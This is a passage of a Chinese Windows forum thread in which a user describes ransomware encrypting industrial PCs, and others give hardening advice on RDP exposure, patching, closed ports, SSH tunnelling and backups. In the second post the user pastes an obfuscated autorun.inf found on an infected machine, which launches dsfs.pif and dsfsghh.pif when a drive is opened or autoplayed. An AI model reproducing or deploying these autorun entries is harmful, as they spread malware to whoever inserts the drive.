远景论坛 - 微软极客社区 › 论坛 › 全新 Windows 论坛 - 微软全新一代操作系统 › Windows 10 论坛 > 今天又差点被勒索了

12 3 下一页

查看: 6018|回复: 42

[讨论] 今天又差点被勒索了 [复制链接]
电梯直达
复制

a2013025

Rank: 5 Rank: 5 Rank: 5

UID: 1640654
帖子: 779
PB币: 835
贡献: 0
技术: 9
活跃: 1061

楼主

发表于 2020-10-22 13:25:29 IP属地山东 |只看该作者 |倒序浏览

又一台工控机里文件被加密为.C4H了,就差那张骷髅头的图片了

这黑客能不能找个有钱人欺负，总是欺负我这没有赎金的。

是不是就是因为开了远程桌面端口映射出去而被攻击的啊！

现在已经换了win10，打了补丁，装了火绒，设了密码，关闭了445 139。改了3389，端口映射也关了！我就看看还能不再累勒索了

反对 0

a2013025

Rank: 5 Rank: 5 Rank: 5

UID: 1640654
帖子: 779
PB币: 835
贡献: 0
技术: 9
活跃: 1061

沙发

发表于 2020-10-22 13:27:57 IP属地山东 |只看该作者

再另一台工控里发现这么个脚本
[AutoRhhun]
;lShi doxoD
shell\OPEn\dEfaUlT=1
;
OpeN =dsfs.pif
;
SHeLl\expLORe\ComMand= dsfs.pif
shelL\opEn\cOmmand= dsfsghh.pif
;
shell\AutOplay\cOmghgmAND=dsfs.pif

相对湿度相对湿度当前离线积分 313 最后登录 2023-4-21 精华 0 阅读权限 0 主题 112 UID 128079 帖子 782 PB币 1241 威望 0 贡献 0 技术 1 活跃 1839 发消息头像被屏蔽 UID 128079 帖子 782 PB币 1241 贡献 0 技术 1 活跃 1839 串个门加好友打招呼发消息	板凳发表于 2020-10-22 13:34:49 IP属地广东 \|只看该作者提示: 作者被禁止或删除内容自动屏蔽

a2013025

Rank: 5 Rank: 5 Rank: 5

UID: 1640654
帖子: 779
PB币: 835
贡献: 0
技术: 9
活跃: 1061

4^F

发表于 2020-10-22 13:36:45 IP属地山东 |只看该作者

相对湿度发表于 2020-10-22 13:34
好羡慕，好想中一次

打开端口，关闭防火跟密码，放在公网上很快就能招来了

hugarninwow

2012以后回地球看看

Rank: 15

UID: 615559
帖子: 16833
PB币: 9766
贡献: 0
技术: 62
活跃: 2944

5^F

发表于 2020-10-22 13:37:29 IP属地广东 |只看该作者

你裸奔了？

这类病毒大多数利用系统漏洞感染，余下的是邮件、U盘等文件传输方式感染，有杀毒软件基本都会发出警告。已知漏洞系统都会及时堵上，所以保持系统更新，就已经堵住了最大传播途径。剩下的就交给杀毒软件和个人安全意识了。

a2013025

Rank: 5 Rank: 5 Rank: 5

UID: 1640654
帖子: 779
PB币: 835
贡献: 0
技术: 9
活跃: 1061

6^F

发表于 2020-10-22 13:43:04 IP属地山东 |只看该作者

hugarninwow 发表于 2020-10-22 13:37
你裸奔了？

这类病毒大多数利用系统漏洞感染，余下的是邮件、U盘等文件传输方式感染，有杀毒软件基本都会 ...

之前一直裸奔……

点评

sooyun 裸奔没问题，裸奔在防火墙路由器以外的外网，然后还不自动更新，那就是作死了发表于 2020-10-22 15:31 IP属地江苏

zhanglc8801

Rank: 2 Rank: 2

UID: 1088408
帖子: 119
PB币: 673
贡献: 0
技术: 0
活跃: 682

7^F

发表于 2020-10-22 13:43:51 IP属地北京 |只看该作者

1.使用SSH加密远程连接，服务器上安装freeSSHd，然后使用SecureCRT做端口转发进行连接。
2.关闭默认的Administrator账号，换用其他账号。
3.远程电脑上安装服务器安全狗，限制特定的计算机名进行登录，并给服务器安全狗设置密码。
前段时间也遭遇勒索病毒了，10TB的数据都被加密幸亏有备份，然后就改成这样的登录方式了。